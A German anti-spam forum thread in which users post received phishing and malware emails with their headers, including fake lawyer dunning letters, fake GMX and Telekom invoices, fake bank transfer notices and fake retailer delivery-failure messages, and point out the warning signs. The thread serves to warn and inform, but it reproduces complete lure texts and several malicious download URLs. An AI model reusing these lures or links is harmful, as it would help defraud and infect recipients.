Für Sie wurde ein elektronisches Ticket erstellt. Die Bordkarte für Ihren Lufthansa Flug erhalten Sie schnell und bequem ab 23 Std. vor Abflug über den Online Check-in auf lufthansa.com. Halten Sie bitte zur Identifikation Ihren Buchungscode, Ihre Miles & More Credit Card oder die Kreditkarte bereit, die Sie zur Buchung genutzt haben. Alternativ können Sie Ihre Bordkarte auch am Flughafen an einem Check-in Automaten erhalten.

Der Rest der Mail ist gekürzt, entspricht dem Lufthansa-Standard und wurde vermutlich von dort raubkopiert. [Bemerkung von Mittwoch eingefügt]
Im Anhang ist dann eine Datei namens 20131029_elektronisches Ticket_582SJJ.zip, die laut VirusTotal erwartungsgemäß nicht ganz koscher ist (https://www.virustotal.com/de/file/135269bd33c1e5342dbd7ac258025aec6ebfd750366d8903ae5407b0f43e757d/analysis/1383043057/). Wie üblich sprechen derzeit noch nicht viele Scanner an. Allein die Tatsache, dass es sich um eine ZIP-Datei anstelle der angekündigten PDF-Datei handelt, ist Indiz genug. [Eine PDF-Datei ist allerdings nicht minder gefährlich, denn sie kann auch Schädlinge enthalten.]

Schönen Gruß
Mittwoch

Solli
12.11.2013, 08:56
Meine Frau hat eine Mail an ihre GMX-Adresse bekommen, sie müsse noch 296 Euro an die Firma Comtech zahlen. Die Absenderadresse ist "geklaut" und gehört zu einem Sportverein. Den vollständigen Header habe ich leider nicht vorliegen.

Was mich an diesem Exemplar irritiert ist dass es weder einen Dateianhang noch einen Link enthielt. Kann es sein, dass GMX das ausgefiltert hat? Oder hat Spammy einfach etwas falsch konfiguriert? So ergibt die "Mahnung" jedenfalls überhaupt keinen Sinn. Wir haben auch noch nie was bei Comtech bestellt, und wenn dann würden die wohl kaum Mahnungen von einer TSV-irgendwas-Adresse verschicken.

P.S.: Die Mail enthielt als Anrede den (korrekten) Mädchennamen meiner Frau.

markusg
12.11.2013, 11:21
mal in den html teil geschaut? evtl. sind da ja gefälschte Links etc.
Mir ist letzte Woche schon mal bei ner anderen Spam in deutsch aufgefallen, dass der Anhang vergessen wurde...

Solli
12.11.2013, 11:38
Nein, da ist tatsächlich überhaupt gar kein Link enthalten.

markusg
12.11.2013, 14:26
Ja dann tipp ich mal auf falsche Konfig.
Ich weis nicht genau, wie das bei GMX ist, aber zumindest sollte ein Vermerk im Betreff stehen, wenn ein Anhang gelöscht wurde, bzw würde die Mail gar nicht zugestellt werden.

Smart
12.11.2013, 14:55
hatte bei GMX auch schon so eine Mail bekommen ohne Anhang.

Frechdachs
21.11.2013, 15:19
Hallo zusammen,

das ist grade aufgeschlagen.


Verehrter Kunde,

der fällige Betrag konnte nicht von Ihrem Konto automatisch abgezogen werden. Es wurden Überweisungen bis zum 21.11.2013 einbezogen.

Vorgangsnummer: GFC6548606C
Produkt/Leistung: 153963013
Gesamtbetrag: 476,00 Euro

Der Rechnungsbetrag der Bestellung inklusive der Versandkosten beläuft sich auf 476,00 Euro. Unser Anwaltsbüro wurde berechtigt die fällige Gesamtsumme für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 12,00 Euro verrechnet und die Kosten unserer Tätigkeit von 27,93 Euro.

Sparen Sie uns bitte weitere Maßnahmen gegen Ihre Person. Wenn Sie die Überweisung weigern werden wir umgehend ein Inkassobüro zu Hilfe ziehen. Sie haben bis zum 25.11.2013 die letzte Möglichkeit das Geld zu zahlen.

Die Lieferdaten Ihrer PayPal Rechnung und die Kontodaten zur Überweisung sind im Anhang.

Mit freundlichen Grüßen

Beauftragte Anwaltschaft Rafael Grebel und Capito

Im Anhang: Forderung der abgewiesenen Zahlung - Im Auftrag Anwalt. zip 52,0 KB

Return-path: <lpage [at] hawaii.rr.com>
Delivery-date: Thu, 21 Nov 2013 13:29:05 +0100
Received: from [195.4.92.12] (helo=mx2.freenet.de)
by mbox11.freenet.de with esmtpa (ID exim) (Exim 4.80.1 #3)
id 1VjTNY-0000EO-O1
for meineemail [at] provider.de; Thu, 21 Nov 2013 13:29:05 +0100
Received: from cdptpa-outbound-snat.email.rr.com ([107.14.166.226]:47524 helo=cdptpa-oedge-vip.email.rr.com)
by mx2.freenet.de with esmtp (port 25) (Exim 4.80.1 #4)
id 1VjTNV-0000O0-VV
for meineemail [at] provider.de; Thu, 21 Nov 2013 13:29:04 +0100
Authentication-Results: cdptpa-oedge02 smtp.user=lpage [at] hawaii.rr.com; auth=pass (LOGIN)
Received: from [80.130.205.81] ([80.130.205.81:64366] helo=PC)
by cdptpa-oedge02 (envelope-from <lpage [at] hawaii.rr.com>)
(ecelerity 3.5.0.35861 r(Momo-dev:tip)) with ESMTPA
id 75/65-29861-B8CFD825; Thu, 21 Nov 2013 12:29:01 +0000
From: "Anwalt" <lpage [at] hawaii.rr.com>
Message-ID: <75.65.29861.B8CFD825 [at] cdptpa-oedge02>
To: "Mein Name" <meineemail [at] provider.de>
Subject: 21.11.2013 Ihre Konto-Lastschrift ist gescheitert
Date: Thu, 21 Nov 2013 12:28:57 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC8B7584C8"
X-RR-Connecting-IP: 107.14.168.130:2525
X-Cloudmark-Score: 0
X-purgate-ID: 149285::1385036944-00000A07-010FAF9B/0-0/0-0
Delivered-To: meineemail [at] provider.de
Delivered-To: meineemail [at] provider.de
Envelope-to: meineemail [at] provider.de
X-Originated-At: 107.14.166.226!47524
Delivered-To: meineemail [at] provider.de

Gruß Frechdachs

Walbeck
21.11.2013, 21:35
Ein Anwalt warnt vor "Mahnungsschreiben" für angebliche Forderungen für Ikea, in denen mißbräuchlich sein Name verwendet wird.
http://www.anwalt.de/rechtstipps/warnung-falsche-mahnung-unter-ausnutzung-des-namens-doering_053046.html

Frechdachs
25.11.2013, 12:00
Moin zusammen,

auf ein neues.
Return-Path: <benzcfm3 [at] t-online.de>
Received: from mailout10.t-online.de (mailout10.t-online.de [194.25.134.21])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by mtain-di01.r1000.mx.aol.com (Internet Inbound) with ESMTPS id D93D33800010A
for <droelf123nr2 [at] aol.com>; Mon, 25 Nov 2013 05:35:39 -0500 (EST)
Received: from fwd03.aul.t-online.de (fwd03.aul.t-online.de )
by mailout10.t-online.de with smtp
id 1VktVt-00044V-5Y; Mon, 25 Nov 2013 11:35:33 +0100
Received: from neousin-d200720 (rxcjDOZHZhUyzcw1Wi0kjoSUqS1Xv6yY8oMqkPRFDF0Dzx1BZsqPiqcIOq8qSNlgx8@[94.219.249.146]) by fwd03.t-online.de
with esmtp id 1VktVh-1ASO000; Mon, 25 Nov 2013 11:35:21 +0100
From: "Online Mahnung" <benzcfm3 [at] t-online.de>
To: "Kein Name" <droelf123nr2 [at] aol.com>
Subject: Die Buchung von Ihrem Konto konnte nicht erfolgen
Date: Mon, 25 Nov 2013 10:35:20 GMT


Sehr geehrter Kunde,

der fällige Betrag konnte nicht von Ihrem Konto automatisch gebucht werden. Es wurden Geldeingänge bis zum 22.11.2013 berücksichtigt.

Die Gesamtsumme der Bestellung inklusive der Versandkosten entspricht 499,00 Euro. Unsere Kanzlei wurde berechtigt den ausstehenden Betrag für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 17,00 Euro verrechnet und die Kosten unserer Beauftragung von 42,98 Euro.

Mahnung Nr.: GH178601728H

Ersparen Sie uns bitte weitere Maßnahmen gegen Ihre Person. Wenn Sie die Überweisung verweigern müssen Sie mit sehr erheblichen Bußgeldern rechnen. Sie haben bis zum 28.11.2013 Zeit die gesamte Summe zu überweisen.

Detaillierte Einzelheiten Ihrer PayPal Rechnung und die Kontonummer zur Nachzahlung sehen Sie im angehängten Ordner.

Mit freundlichen Grüßen

Rechnungsstelle Maurice von Hohenegg und Stein

Und der übliche zip-Anhang mit 22,5 KB.


Gruß Frechdachs

Frechdachs
25.11.2013, 16:07
Hallo allerseits,

die scheint aus der selben Schmiede zu kommen, der gleiche Rechtschreibfehler. >>Anwaltskanalei
Siehe Zeile 16 im Header und auch hier (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=362261&viewfull=1#post362261).

Return-Path: <gaudetjg [at] videotron.ca>
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
by mtaiw-mac04.mx.aol.com (Internet Inbound) with ESMTP id 7E9317000735B
for <droelf123nr2 [at] aol.com>; Mon, 25 Nov 2013 09:40:25 -0500 (EST)
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_g3H4uoQqcvIKysAiMClDiA)"
Received: from VL-MO-MA003 ([10.23.37.47]) by VL-VM-MR004.ip.videotron.ca
(Oracle Communications Messaging Exchange Server 7u4-22.01 64bit (built Apr 21
2011)) with ESMTP id <0MWT00LTJQ3D4M90 [at] VL-VM-MR004.ip.videotron.ca> for
droelf123nr2 [at] aol.com; Mon, 25 Nov 2013 09:40:25 -0500 (EST)
Message-id: <0MWT00LTKQ3D4M90 [at] VL-VM-MR004.ip.videotron.ca>
Received: from NBTAUSENDFREUDE
(dyndsl-095-033-110-161.ewe-ip-backbone.de [95.33.110.161])
by VL-VM-MR001.ip.videotron.ca with ESMTPA; Mon,
25 Nov 2013 09:30:17 -0500 (EST)
From: Anwaltskanalei <gaudetjg [at] videotron.ca>
To: Kein Name angegeben <droelf123nr2 [at] aol.com>
Subject: Rechnung der stornierten Zahlung Ihrer Bestellung 25.11.2013
Date: Mon, 25 Nov 2013 14:30:16 +0000 (GMT)



Symantec hat gefiltert.

This message has been processed by Symantec's AntiVirus Technology.

25.11.2013 Beauftragte Anwaltschaft - stornierte Lastschrift.com was infected with the malicious virus Trojan Horse and has been deleted because the file cannot be cleaned.


For more information on antivirus tips and technology, visit
http://ses.symantec.com/

Originaltext

Sehr geehrter Kunde,

der automatische Abzug von Ihrem Bankkonto f=C3=BCr die Bestellung vom 08.1=
0.2013 konnte nicht durchgef=C3=BChrt werden. Es wurden Geldeing=C3=A4nge b=
is zum 22.11.2013 einbezogen.=20

Die Summer der Bestellung inklusive der Versandkosten entspricht 413,00 EU.=
Unser Anwaltsb=C3=BCro wurde beauftragt das Geld f=C3=BCr Ihre Bestellung =
einzufordern. Zuz=C3=BCglich wird Ihnen eine Mahngeb=C3=BChr von 17,00 Euro=
verrechnet und die Geb=C3=BChren unserer Beauftragung von 59,21 Euro.=20

Vorgangsnummer: GAH754786G

Sparen Sie uns bitte weitere rechtlichen Schritte gegen Ihre Person. Wenn S=
ie die Zahlung verweigern sehen wir und gezwungen ein Gerichtsverfahren geg=
en Sie anzustreben. Sie haben bis zum 27.11.2013 die letzte M=C3=B6glichkei=
t die gesamte Summe zu zahlen.=20

Weitere Details Ihrer PayPal Rechnung und die Bankdaten zur Nachzahlung seh=
en Sie im angeh=C3=A4ngten Ordner.=20

Mit freundlichen Gr=C3=BC=C3=9Fen=20

Online Mahnung Maurice Melber und Schulze
Gruß Frechdachs

carsten.gentsch
26.11.2013, 13:29
Hallo bin dabei allerding hatte GMX was da gegen mir die Mail zuzeigen ;) die Mail ging an eine Adresse die nirgens gebraucht wurde somit wäre das Datenleck bei GMX bewiesen. Denn dei Addy ist Jahre alt und war nicht in gebrauch.

Liebes GMX Mitglied,
eine an Sie adressierte E-Mail wurde von unserem Virenscanner
als gefährlich eingestuft.
Um weiteren Schaden für Sie auszuschließen, wurde die E-Mail gelöscht.

Es folgen Details zu der betroffenen E-Mail:

Von: "Beauftragte Anwaltschaft" <vbryry [at] sina.cn>
An: "me" <d... [at] gmx.de>
Datum: Tue, 26 Nov 2013 10:11:44 GMT
Betreff: Klar Name stand drin... die Lastschrift konnte von Ihrem Bankkonto nicht vorgenommen werden

MFG

Carsten

Solli
26.11.2013, 15:19
Datenleck kann sein, oder auch einfach brute force. Mag sein, dass der Spammer einfach verschiedene Buchstabenkombinationen und gängige Namen @gmx.de durchprobiert.

Aber ich habe heute auch so einen Virus bekommen, wenn ich mich recht erinnere zum ersten mal auf diese Adresse. Also hat da wohl jemand wieder irgendwo Adressen eingekauft.

carsten.gentsch
26.11.2013, 20:19
Hallo diese Emailadresse hatte aber mit meinen Namen nichts zu tun begann mit dirty noch was usw. also wäre Brutforce hier falsch wohl eher das Datenleck.

Eniac
05.12.2013, 07:58
Return-Path: <goshesh8 [at] gmxnet.de>
Received: from 66.170.broadband10.iol.cz ([90.177.170.66]) by
mr1.firma.tld with esmtp (envelope-from <goshesh8 [at] gmxnet.de>) id
1VnnYo-00060L-Ce for adress [at] firma.tld; Tue, 03 Dec 2013
11:51:15 +0100
Received: from [137.1.181.101] (account tacticallymqh69 [at] gmxnet.de HELO
dalubhmlrlnhpr.qvmwkweesqsff.tv) by 66.170.broadband10.iol.cz (CommuniGate
Pro SMTP 5.2.3) with ESMTPA id 710546904 for
adress [at] firma.tld; Tue, 3 Dec 2013 11:50:33 +0100
Date: Tue, 3 Dec 2013 11:50:33 +0100
From: GMX <rechnungsstelle [at] gmxnet.de>
To: <adress [at] firma.tld>
Subject: GMX - Ihre Rechnung vom 03.12.2013
Message-ID: <82675438582029.MJ2P22PU651649 [at] tndsul.wwmtobadfdlidne.va>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=a__jobpwmc_06_81_74"


Ihre Kundennummer: 483108802

Sehr geehrter,

anbei erhalten Sie Ihre Rechnung vom 03.12.2013.
Wie vereinbart werden wir den Betrag in den nächsten Tagen von Ihrem Konto einziehen.

Ihre Rechnung ist im PDF-Format erstellt worden. Um sich Ihre Rechnung anschauen zu können, klicken Sie auf den Anhang und es öffnet sich automatisch der Acrobat Reader. Sollten Sie keinen Acrobat Reader besitzen, haben wir für Sie den Link zum kostenlosen Download von Adobe Acrobat Reader mit angegeben. Er führt Sie automatisch auf die Downloadseite von Adobe. So können Sie sich Ihre Rechnung auch für Ihre Unterlagen ausdrucken.

http://www.adobe.de/products/acrobat/readstep2.html

GMX ist ein Dienst der 1&1 Mail & Media GmbH.


Mit freundlichen Grüßen

Ihr GMX Kundenservice


--

Impressum: http://gmxnet.de/de/impressum

[ Dies ist eine automatisch generierte Nachricht, bitte antworten Sie nicht an diesen Absender.
Falls Sie Fragen an den GMX Support haben, verwenden Sie bitte das Formular auf www.gmx.de/rechnungsfragen ]

Im Anhang: RG098653308.zip = RG098653308.pdf.exe = Trojaner RDN/Generic PWS.y!wh


Eniac

carkiller08
20.12.2013, 09:32
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 81.169.158.170) smtp.mailfrom=Telekom [at] mail.kmu.cmbl.de; dkim=none header.d=rinne-hiltrup.de; x-hmca=none header.id=ulli [at] rinne-hiltrup.de
X-SID-PRA: ulli [at] rinne-hiltrup.de
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTnndnfpCmYs2XILNdLm2UmGCWhFy6SREG64AXXtVirb+hjK+fv5/PfWh1Hf8Smu5d0+/t9wqUDVcPMgrK61pGVU4B0QegbfOPD3cOlAaxibxIIjUHI/9FFyLJOBpvtYvXLYgRJwoUpEWLw82ohVAvDcam3O6HHoilHMthlFWtNyCi2113fPTLTqycV9/HabXIsoSIV7Lmkh3jg/9LSuun+L
Received: from mail.kmu.cmbl.de ([81.169.158.170]) by COL0-MC1-F3.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Thu, 19 Dec 2013 16:19:53 -0800
Received: from localhost (localhost [127.0.0.1])
by mail.kmu.cmbl.de (Postfix) with ESMTP id C459211A09BA
for <***>; Fri, 20 Dec 2013 01:19:52 +0100 (CET)
X-Virus-Scanned: amavisd-new at stratoserver.net
X-Amavis-Alert: BANNED, message contains .exe,.exe-ms,Ihre Telekom Mobilfunk
RechnungOnline =?iso-8859-1?Q?f=81r_Gesch=84ftskunden?=
7295457930907458 vom 19.12.2013 des Kundenkontos.exe
Received: from mail.kmu.cmbl.de ([127.0.0.1])
by localhost (h2034942.stratoserver.net [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id 2Cm7DvnNdEVK for <***>;
Fri, 20 Dec 2013 01:19:50 +0100 (CET)
Received: from w7-delmarco (mx.rbt.at [83.175.125.162])
by mail.kmu.cmbl.de (Postfix) with ESMTPA id 67DDA11A08EF
for <***>; Fri, 20 Dec 2013 01:19:50 +0100 (CET)
Date: Fri, 20 Dec 2013 01:16:02 +0100
From: Telekom Deutschland GmbH
<ulli [at] rinne-hiltrup.de>
To: ***
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01cefd18$Blat.v3.1.1$ac1b8ba1$10fc60b63f8 [at] mail.kmu.cmbl.de>
Subject: =?ISO-8859-1?Q?Ihre_Telekom_Mobilfunk_RechnungOnline_f=FCr?=
=?ISO-8859-1?Q?_Gesch=E4ftskunden_050050252532555739_vom_19=2E12=2E2013_des?=
Kundenkontos 006006392254.
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_BlatBoundary-QtC4lEZSjZjDVAp0rcGTs"
Return-Path: Telekom [at] mail.kmu.cmbl.de
X-OriginalArrivalTime: 20 Dec 2013 00:19:54.0078 (UTC) FILETIME=[34B797E0801CEFD19]




Sehr geehrte Kundin,
sehr geehrter Kunde

Im Anhang finden Sie die gewünschten Dokumente und Daten zu Ihrer Telekom Mobilfunk RechnungOnline für Geschäftskunden vom Monat November. Zum Umgang mit verschlüsselten Dateien finden Sie bei Bedarf Hinweise unter:

https://rechnungonline-business.t-mobile.de

Mit freundlichen Grüßen,
Geschäftskundenservice

Telekom Deutschland GmbH
Aufsichtsrat: Timotheus Höttges Vorsitzender
Geschäftsführung: Niek Jan van Damme Sprecher, Thomas Dannenfeldt, Thomas Freude, Michael Hagspihl, Dr. Bruno Jacobfeuerborn, Dietmar Welslau, Dr. Dirk Wössner
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 122265872
WEEE-Reg.-Nr.: 60800328





Als Anhang gibt es eine Datei " Telefonrechnung_Telekom_November_2013_PDF.zip "
mit einer EXE-Datei.

schnerpelfliege
06.01.2014, 22:01
E-mail an:
ueberweisung-f-s-4 [at] finanz-institut.com

Der Download enthält ein Virus.

Empfanger dieser Mail hängen in einem Verteiler.
Jede Antwort auf diese Mail erhalten alle Empfänger der Spam-Mail.

Bitte nicht darauf antworten.

Inhalt:

Sehr geehrte Kundin,
sehr geehrter Kunde

Im Anhang finden Sie die gewünschten Dokumente und Daten zu Ihrer Telekom Mobilfunk RechnungOnline für Geschäftskunden vom Monat December,
Download (Ihre Telekom Mobilfunk RechnungOnline für Geschäftskunden 050050252532729573 vom 06.01.2014 des Kundenkontos 387387679622).

Mit freundlichen Grüßen,
Geschäftskundenservice

Telekom Deutschland GmbH
Aufsichtsrat: *** Vorsitzender
Geschäftsführung: ***
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 122265872
WEEE-Reg.-Nr.: 60800328

Eniac
07.01.2014, 09:24
Received: from vs00167.dinodata.vn (unknown [127.0.0.1]) by
vs00167.dinodata.vn (Postfix) with ESMTP id AA2C36684B86 for
<my.name [at] firma.tld>; Tue, 31 Dec 2013 08:50:40 +0000 (UTC)
Received: by vs00167.dinodata.vn (Postfix, from userid 48) id 3B95F66CCAD8;
Sat, 21 Dec 2013 15:13:02 +0000 (UTC)
To: <my.name [at] firma.tld>
Subject: Special Order Delivery Problem
From: Best Buy <BestBuyInfo [at] nhadatban.com.vn>
Reply-To: Best Buy <BestBuyInfo [at] nhadatban.com.vn>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------138763878252B5AFFE1D4E7"
Message-ID: <20131231081616.3B95F66CCAD8 [at] vs00167.dinodata.vn>
Date: Sat, 21 Dec 2013 22:13:02 +0700


My Besy Buy ID: 008409745
Reward certificate(s) available.
WEEKLY DEALS
Cameras Video Games
Dear Sir/Madam,
Your order BBY-7934197342 has not been delivered because the specified address was not correct.
Please fill this form and send it back with your reply to this message. --> http://hoffmans-leder.de/message/zOWm554rqyOqecO4DqiVrC34LKcpoU84tnznmqQ0a0Q=/BestBuyForm

If we do not receive your reply within a week we will pay your money back less 17 because your order was reserved for the time of Christmas holidays.
________________________________________
Best Buy 7601 Penn Avenue South, Richfield, MN 18725-3760
BEST BUY, the BEST BUY logo, the tag design, BESTBUY.COM, GEEK SQUAD, the GEEK SQUAD logo, MY BEST BUY, REWARD ZONE, BEST BUY MOBILE and the BEST BUY MOBILE logo are trademarks of BBY Solutions, Inc. All other trademarks or trade names are properties of their respective owners.

--------------------------------------------------------------------------------

Received: from portal.dnspriv.com ([173.193.201.179] helo=win01) by
mr2.firma.tld with esmtp (envelope-from <manager [at] flapco.org>) id
1VvM2n-00027r-2L for my.name [at] firma.tld; Tue, 24 Dec 2013
08:04:45 +0100
Received: from win01 ([127.0.0.1]) by win01 with Microsoft
SMTPSVC(7.5.7601.17514); Tue, 24 Dec 2013 03:44:42 -0300
Date: Tue, 24 Dec 2013 00:44:42 -0600
Subject: Special Order Delivery Problem
To: <my.name [at] firma.tld>
From: Costco <manager [at] flapco.org>
Reply-To: Costco <manager [at] flapco.org>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------138786748252B92D5AC9352"
Message-ID: <WIN01GNsokLQ8aZRhQd000000da [at] win01>


Unfortunately the delivery of your order COS-0054310607 was cancelled since the specified address of the recipient was not correct. You are recommended to complete this form and send it back with your reply to us. --> http://esector.co/media/WbtgYoUJ9MXu8vgrd4ZmsS34LKcpoU84tnznmqQ0a0Q=/CostcoForm

Please do this within the period of one week - if we dont get your timely reply you will be paid your money back less 21% since your order was booked for Christmas.

1998 - 2013
Costco Wholesale Corporation
All rights reserved


Eniac

carkiller08
16.01.2014, 19:11
Ihre Rechnung für Januar 2014

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Januar 2014 beträgt: 295.36 Euro. Wir bitten Sie, die Rechnung zu begleichen. Details zur Ihre Rechnung können Sie hier ansehen:

Download (Mitteilung, Rechnungsrückstände 573520629758 Telekom Deutschland vom 16.01.2014).
http://gorbache.ru/telekom_deutschland/

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse.

Informationen über die Umstellung auf den einheitlichen Euro-Zahlungsverkehrsraum SEPA finden Sie hier.

Speziell für Sie: Möchten Sie zukünftig Informationen über neue Produkte und Tarife erhalten, melden Sie sich zu unserem kostenlosen Informationsservice an.


Mit freundlichen Grüßen

R.H.
Leiter Kundenservice

Telekom Deutschland GmbH
Aufsichtsrat: Timotheus Höttges Vorsitzender
Geschäftsführung: Niek Jan van Damme Sprecher, Thomas Dannenfeldt, Thomas Freude, Michael Hagspihl, Dr. Bruno Jacobfeuerborn, Dietmar Welslau, Dr. Dirk Wössner
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 264106267716
WEEE-Reg.-Nr.: 367452552905

--
This email was Virus checked by AVIRA. Mail wurde auf Viren geprüft.


Received: from s007-ct-ffm-r01.ec-c.net ([85.190.1.220]) by COL0-MC2-F28.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Thu, 16 Jan 2014 03:28:57 -0800
Received: from pc_benedikt (localhost.localdomain [127.0.0.1])
by s007-ct-ffm-r01.ec-c.net (Postfix) with ESMTPA id 0901485486B
for <hotelaltersimpel [at] hotmail.com>; Thu, 16 Jan 2014 12:28:57 +0100 (CET)
Received: from pc_benedikt ([80.120.229.198] helo=pc_benedikt) by
PLANETSPAM; 16 Jan 2014 12:28:54 +0100
Date: Thu, 16 Jan 2014 12:28:57 +0100
From: Telekom <ph5s325p3 [at] s007-ct-ffm-r01.ec-c.net>
To: hotelaltersimpel [at] hotmail.com
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01cf12ae$Blat.v3.1.1$268d5b7e$6408e4f01a3 [at] s007-ct-ffm-r01.ec-c.net>
Subject: RechnungOnline Monat Januar 2014, Buchungskonto: 179784249675.
Content-Transfer-Encoding: 8BIT
Content-Type: text/html;
charset="ISO-8859-1"
Return-Path: Telekom [at] s007-ct-ffm-r01.ec-c.net
X-OriginalArrivalTime: 16 Jan 2014 11:28:58.0156 (UTC) FILETIME=[259B06C0:01CF12AE]

carkiller08
17.01.2014, 20:01
Information zu: Überweisung/Umbuchung
Empfänger: Sing Grundstuecksverwaltung VC
IBAN/Kontonummer: DE351202500007139376**
BIC/BLZ: GENODES1OVX
Bei Kreditinstitut: HEIDENHEIMER VOLKSBANK VC HEIDENHEIM (BRENZ)
Betrag in EUR: 1656,56
Verwendungszweck: Customer Nr24241642**
Auftraggeber (Kontoinhaber): Sing Grundstuecksverwaltung VC

Verwendete TAN: 9222**
Ihren Auftrag haben wir entgegengenommen.
_________________________________________________________________

Es kann einige Minuten dauern, bis die Transaktion in Ihrem Konto angezeigt wird.
Weitere Informationen zum Transaktions Volksbank mG.
http://fenius.ru/volksbank_eg/



Received: from mailgate.stumpner.co.at ([88.198.108.126]) by SNT0-MC4-F23.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 17 Jan 2014 04:53:25 -0800
Received: from james.stumpner.co.at (james.stumpner.co.at [88.198.108.122])
by mailgate.stumpner.co.at (Postfix) with ESMTP id 362A84A287DB
for <hotelaltersimpel [at] hotmail.com>; Fri, 17 Jan 2014 13:59:29 +0100 (CET)
Received: from dslb-188-110-010-203.pools.arcor-ip.net ([188.110.10.203])
by james.stumpner.co.at (JAMES SMTP Server 2.3.0) with SMTP ID 595
for <hotelaltersimpel [at] hotmail.com>;
Fri, 17 Jan 2014 13:59:29 +0100 (CET)
Subject: Transaktions Volksbank eG, Nr:595368857-812.

Wowoka
25.01.2014, 15:25
Angeblich eine Email von Otto :clown:


п»ї
Sehr geehrte Damen und Herren,

Mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung als Zip-Datei. Antworten Sie auf diese Mail mit der Bitte um Umstellung des Auftrags auf Nachnahme.

Mit freundlichen GrГјГџen,
Ihre Kundenbetreuung

Den Anhand habe natürlich nicht geöffnet.

cano89
25.01.2014, 22:34
Guten Abend,

Bin ganz neu hier. Ich habe ebenfalls eine Spammail erhalten die hier noch nicht genannt wurde. Nach dem kopieren habe ich Sie gelöscht, leider ohne den Header mit zu kopieren :confused:


FinanzGruppe Fiducia AG (gerold.cvach [at] architekt-cvach.de)


Information zu: Überweisung/Umbuchung
Empfänger: B*** P*** A***, Grundstuecksverwaltung YR
IBAN/Kontonummer: DE4366751***
BIC/BLZ: BEYLBCS1NDU
Bei Kreditinstitut: HEIDENHEIMER VOLKSBANK FA HEIDENHEIM (BRENZ)
Betrag in EUR: 1687,87
Verwendungszweck: Gehalt Nr 753477710_J_875973
Auftraggeber (Kontoinhaber): B*** P*** A***, Grundstuecksverwaltung YR

Verwendete TAN: 734615
Ihren Auftrag haben wir entgegengenommen.
____________________________________________________________

Es kann einige Minuten dauern, bis die Transaktion in Ihrem Konto angezeigt wird.
Weitere Informationen zum Transaktions Volksbank FA.
http://gf-58.ru/volksbank_eg/

----
This email was Virus checked by Microsoft Security Essentials. Mail wurde auf Viren geprüft.

Vorsicht vor dem Link - der funktioniert noch. Link zu Virustotal https://www.virustotal.com/de/file/4a34b0bf3246c2cc3cd1f56a18db39860efcc5e28932a13ad1dcdbe6f85de046/analysis/1390314571/

Eniac
27.01.2014, 10:44
Return-Path: <m-hand [at] www1072.sakura.ne.jp>
Received: from www1072.sakura.ne.jp (localhost [127.0.0.1]) by
www1072.sakura.ne.jp (8.14.5/8.14.5) with ESMTP id s0PGKWi1043096 for
<my.name [at] firma.tld>; Sun, 26 Jan 2014 01:20:32 +0900 (JST)
(envelope-from m-hand [at] www1072.sakura.ne.jp)
Received: (from m-hand [at] localhost) by www1072.sakura.ne.jp
(8.14.5/8.14.5/Submit) id s0PGKWFN043095; Sun, 26 Jan 2014 01:20:32 +0900
(JST) (envelope-from m-hand)
Date: Sun, 26 Jan 2014 01:20:32 +0900
Message-ID: <201401251620.s0PGKWFN043095 [at] www1072.sakura.ne.jp>
To: <my.name [at] firma.tld>
Subject: Special Shipping Problem
From: Walmart Shipping Manager <walmart.support [at] kurumai.jp>
Reply-To: Walmart Shipping Manager <walmart.support [at] kurumai.jp>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------139066683252E3E4501C1E3"


Walmart
Save money. Live better.

Sir/Madam,

Your order WM-0078239608 delivery has failed.
Reason: Failed delivery attempts
To fix this issue you must fill this form and send it back to us. --> http://outsourcingprogrammingservices.com/box/+1TN5cdv2Yb6iryTjLwyxy34LKcpoU84tnznmqQ0a0Q=/WalmartForm

If your reply is not received within one week, you will be paid your money back but 14% will be deducted.

Walmart Manager
Jacob Hardy
2013 Wal-Mart Stores, Inc.


Eniac

SpamKampf
12.02.2014, 14:14
